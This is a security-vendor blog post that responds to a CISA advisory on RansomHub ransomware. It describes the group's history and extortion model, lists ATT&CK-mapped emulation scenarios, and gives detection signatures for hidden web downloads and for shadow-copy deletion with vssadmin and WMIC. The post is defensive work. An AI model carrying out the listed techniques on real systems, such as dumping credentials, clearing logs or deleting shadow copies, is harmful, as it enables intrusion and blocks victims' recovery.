Response to CISA Advisory (AA24-242A): #StopRansomware: RansomHub Ransomware

AttackIQ has released a new assessment template in response to the CISA Advisory (AA24-207A) published on August 29, 2024, that disseminates known RansomHub ransomware IOCs and TTPs that have been identified through FBI threat response activities and third-party reporting as recently as August 2024. Read More

On August 29, 2024, the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Department of Health and Human Services (HHS) released a Cybersecurity Advisory (CSA) to disseminate known RansomHub ransomware IOCs and TTPs that have been identified through FBI threat response activities and third-party reporting as recently as August 2024.

This joint CSA is a continuation of CISA’s ongoing #StopRansomware effort to arm defenders with the intelligence they need to combat different ransomware variants and ransomware threat actors.

RansomHub, formerly known as Cyclops and Knight, is a ransomware strain operated under the Ransomware-as-a-Service (RaaS) business model that has been active since at least February 2024.

The RansomHub began its history as Cyclops ransomware around May 2023 and gained notoriety for being capable of infecting all major operating systems including Windows, Linux, and macOS.  On July 27, 2023, Cyclops operators announced via their web portal the roll-out of version 2.0 in conjunction with the rebranding to Knight Ransomware. Almost 6 months later, in February 2024, Knight was rebranded as RansomHub. Since then, it has positioned itself as an efficient and successful service model while recently attracting high-profile affiliates of other prominent variants such as LockBit and ALPHV.

Since its inception, RansomHub has encrypted and exfiltrated data from at least 210 victims representing the water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services, commercial facilities, critical manufacturing, transportation, and communications critical infrastructure sectors.

The affiliates leverage a double-extortion model by encrypting systems and exfiltrating data to extort victims. The ransom note dropped during encryption does not generally include an initial ransom demand or payment instructions. Instead, the note provides victims with a client ID and instructs them to contact the ransomware group via a unique .onion URL. The ransom note typically gives victims between three and 90 days to pay the ransom (depending on the affiliate) before the ransomware group publishes their data on the RansomHub Tor data leak site.

AttackIQ has released a new assessment template that includes the post-compromise Tactics, Techniques and Procedures (TTPs) exhibited by RansomHub during its latest activities to help customers validate their security controls and their ability to defend against sophisticated threats.

Validating your security program performance against these behaviors is vital in reducing risk. By using these new assessment templates in the AttackIQ Security Optimization Platform, security teams will be able to:

  • Evaluate security control performance against the behaviors exhibited by a threat that continues to conduct worldwide ransomware activities.
  • Assess their security posture against activities focused on both encryption and exfiltration of sensitive information.
  • Continuously validate detection and prevention pipelines against a playbook similar to those of many of the groups that are currently focused on ransomware activities.

[CISA AA24-242A] #StopRansomware: RansomHub Ransomware

This assessment template emulates the post-compromise Tactics, Techniques, and Procedures (TTP) exhibited by RansomHub affiliates during their latest activities.

The assessment template is divided into tactics, grouping the techniques and implementations used by affiliates at each stage of their activities.

1. Execution

Consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, such as exploring a network or stealing data.

BITS Jobs (T1197): This scenario executes bitsadmin to create a BITS job and configure it to download a remote payload. Background Intelligent Transfer Service (BITS) is a native mechanism used by legitimate applications to use a system’s idle bandwidth to retrieve files without disrupting other applications.

Windows Management Instrumentation (WMI) (T1047): This scenario executes a Windows Management Instrumentation (WMI) command. WMI is a native Windows administration feature that provides a method for accessing Windows system components.

2. Persistence

Consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.

Create Account: Local Account (T1136.001): This scenario creates a local account using net user.

3. Defense Evasion

Consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts.

Indicator Removal: Clear Windows Event Logs (T1070.001): The scenario uses the wevtutil.exe binary to clear event logs from the system.

Masquerading: Match Legitimate Name or Location (T1036.005): Renames an executable to rundll32.exe and executes it from the %TEMP% directory.

4. Credential Access

Consists of techniques for stealing credentials like account names and passwords.

OS Credential Dumping (T1003): This scenario uses an obfuscated version of Mimikatz to dump passwords and hashes for Windows accounts.

5. Discovery

Consists of techniques that adversaries use to discover information related to the compromised environment.

System Information Discovery (T1082): This scenario executes the GetSystemInfo Native API call to retrieve information associated to the system.

System Information Discovery (T1082): This scenario executes the GetEnvironmentStrings Native API call to print all the environmental variables. These variables are often used to fingerprint a system using expected environment variables such as OS, PROCESSOR_ARCHITECTURE, or USERNAME.

System Information Discovery (T1082): This scenario will call the GetComputerNameA Windows API to enumerate the computer name.

Peripheral Device Discovery (T1120): This scenario retrieves information about the system’s physical disks using the GetLogicalDriveStringsW API call.

File and Directory Discovery (T1083): This scenario will use the FindFirstFileW, FindNextFileW, and the GetFileSizeEx Windows API calls to enumerate file system.

Process Discovery (T1057): This scenario uses the Windows API to receive a list of running processes by calling CreateToolhelp32Snapshot and iterating through each process object with Process32FirstW and Process32NextW.

Network Service Discovery (T1046): This scenario uses nmap to identify hosts that may be remotely accessible to the attacker by scanning for ports 139, 389, 445, 636 and 3389.

Windows Management Instrumentation (WMI) (T1047): This scenario executes the WMI command wmic path Win32_ShadowCopy to gather shadow copy information.

6. Lateral Movement

Consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts to gain.

Remote Services: Remote Desktop Protocol (T1021.001): This scenario attempts to move laterally within a network using the Remote Desktop Protocol (RDP) protocol.

7. Command and Control

Consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection.

Ingress Tool Transfer (T1105): This scenario downloads to memory and saves to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious payloads.

8. Exfiltration

Consists of techniques that adversaries may use to steal data from your network. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.

Exfiltration Over C2 Channel (T1041): This scenario simulates a data exfiltration attack where a pre-generated text file containing Windows system profiling data is sent via an HTTP POST request to an AttackIQ controlled test server.

9. Impact

Consists of techniques that adversaries use to disrupt availability or compromise integrity by manipulating business and operational processes.

Inhibit System Recovery (T1490): This scenario executes the vssadmin.exe utility to delete a recent Volume Shadow Copy created by the assessment template.

Inhibit System Recovery (T1490): This scenario executes the wmic.exe utility to delete a recent Volume Shadow Copy created by the assessment template.

Opportunities to Expand Emulation Capabilities

In addition to the released assessment template, AttackIQ recommends the following existing scenarios to extend the emulation of the capabilities exhibited in this advisory.

  • Lateral Movement Through PAExec: This scenario simulates lateral movement within a network using PAExec, an open-source version of PSExec.
  • Domain Controller Remote System Discovery via PowerShell Script: This scenario uses PowerShell to identify a list of active domain computers, displaying their names, hostnames, and installed operating systems.

Detection and Mitigation Opportunities

Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection assessment. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1. Review CISA’s Patching and Detection Recommendations:

CISA has provided a significant number of recommendations for the best ways to defend yourself from these and similar attacks. AttackIQ strongly recommends reviewing the detection and mitigation recommendations with the goal of adapting them to your environment first to determine if you have any existing impact before reviewing the assessment results.

2. Ingress Tool Transfer (T1105):

Adversaries often rely heavily on downloading additional stages of malware. Endpoint and Network security controls should both be employed to try and detect the delivery of these malicious payloads.

2a. Detection

The following signatures can help identify when native utilities are being used to download malicious payloads.

PowerShell Example:

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest") AND “DownloadData” AND “Hidden”)

2b. Mitigation

MITRE ATT&CK has the following mitigation recommendations.

3. Inhibit System Recovery (T1490):

Adversaries often delete Volume Shadow Copies to prevent the possibility of restoring files back to their original state. This is a common technique used by ransomware as it prevents the recovery of files once the ransomware encryption routine successfully completes execution.

3a. Detection

Detecting deletion of Volume Shadow Copies is usually the first step that occurs and can be detected by looking at the command line activity

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS (“vssadmin” AND “Delete Shadows”)
Command Line CONTAINS ("WMIC.exe" AND "shadowcopy" AND "delete")

3b. Mitigation

MITRE ATT&CK has the following mitigation recommendations for Inhibit System Recovery

Wrap-up

In summary, this assessment template will evaluate security and incident response processes and support the improvement of your security control posture against an extortive threat. With data generated from continuous testing and the use of these two assessment templates, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against sophisticated nation-state actors.

AttackIQ offers a comprehensive Breach and Attack Simulation Platform to assist security teams. This includes AttackIQ Flex, a tailored pay-as-you-go service; AttackIQ Ready!, a fully managed service for continuous security optimization; and AttackIQ Enterprise, a co-managed service offering enhanced support. These services ensure your team maintains a robust security posture.